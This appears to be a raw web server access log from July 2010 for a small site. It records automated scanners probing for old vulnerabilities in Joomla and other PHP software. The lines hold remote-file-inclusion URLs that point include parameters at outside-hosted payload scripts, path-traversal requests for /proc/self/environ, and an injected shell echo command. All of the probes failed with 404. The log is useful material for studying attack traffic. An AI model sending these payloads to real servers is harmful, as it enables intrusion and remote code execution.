212.13.195.84 - - [24/Jul/2010:02:46:08 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:46:09 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:46:09 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:47:55 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:47:55 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:47:55 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:48:45 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:02:50:06 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.108.64.232 - - [24/Jul/2010:02:50:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:02:50:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:02:50:47 -0700] "GET /logs/access_100227.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:02:53:21 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:02:55:05 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:02:55:05 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:02:55:05 -0700] "GET /logs/access_100522.log/index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:42 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:44 -0700] "GET /logs/access_100529.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:44 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:49 -0700] "GET /logs/access_100529.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:49 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:55:49 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:56:03 -0700] "GET /logs/access_100522.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:02:56:12 -0700] "GET /logs/access_100522.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.236.43.200 - - [24/Jul/2010:02:56:29 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yeshouse.net/my/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:57:55 -0700] "GET /logs/access_100227.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:02:57:55 -0700] "GET /logs/access_100227.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
66.249.65.185 - - [24/Jul/2010:02:58:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:58:49 -0700] "GET /logs/access_100605.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:58:49 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:02:58:49 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:02:59:46 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:03:00:15 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:03:00:15 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:03:00:15 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:00:57 -0700] "GET /logs/access_100522.log%20%20/index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
202.160.123.72 - - [24/Jul/2010:03:01:05 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
202.160.123.72 - - [24/Jul/2010:03:01:06 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
202.160.123.72 - - [24/Jul/2010:03:01:07 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
91.121.26.63 - - [24/Jul/2010:03:01:16 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:01:35 -0700] "GET /logs/access_100529.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:01:35 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:01:36 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:01:37 -0700] "GET /logs/access_100522.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:03:01:51 -0700] "GET /logs/access_100508.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:03:01:51 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:03:01:52 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
114.108.151.149 - - [24/Jul/2010:03:02:10 -0700] "GET /logs/access_100710.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
114.108.151.149 - - [24/Jul/2010:03:02:10 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
114.108.151.149 - - [24/Jul/2010:03:02:11 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:02:22 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:02:22 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:02:22 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:02:44 -0700] "GET /logs/access_100605.log%20%20/index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:03:10 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:03:29 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:03:29 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:03:31 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:04:11 -0700] "GET /logs/access_100313.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.160.123.72 - - [24/Jul/2010:03:04:14 -0700] "GET /logs/access_100227.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:05:02 -0700] "GET /logs/access_100313.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:03:05:04 -0700] "GET /logs/access_100320.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:03:05:04 -0700] "GET /logs/access_100320.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:22 -0700] "GET /logs/access_100529.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:22 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:23 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:28 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:29 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:30 -0700] "GET /logs/access_100529.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:51 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:51 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:51 -0700] "GET /logs/access_100529.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:53 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:53 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:06:53 -0700] "GET /logs/access_100529.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:07:03 -0700] "GET /logs/access_100522.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:07:05 -0700] "GET /logs/access_100522.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
112.104.57.22 - - [24/Jul/2010:03:07:22 -0700] "GET /logs/access_100327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:07:33 -0700] "GET /logs/access_100522.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.59.21.119 - - [24/Jul/2010:03:07:33 -0700] "GET /logs/access_100522.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:08:50 -0700] "GET /logs/access_100508.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:08:50 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:08:51 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:09:26 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=http://www.ofertyregionalne.pl/phpAdsNew-rc3/libraries/data/Ckrid1.txt?? HTTP/1.1" 404 - "-" "dex Bot Search" "www.getyourselfahorse.com"
178.154.163.29 - - [24/Jul/2010:03:09:48 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 6350761 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:09:51 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:09:52 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:09:54 -0700] "GET /logs/access_100515.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:16 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:16 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:17 -0700] "GET /logs/access_100515.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:23 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:23 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.5.163.203 - - [24/Jul/2010:03:10:23 -0700] "GET /logs/access_100515.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:35 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
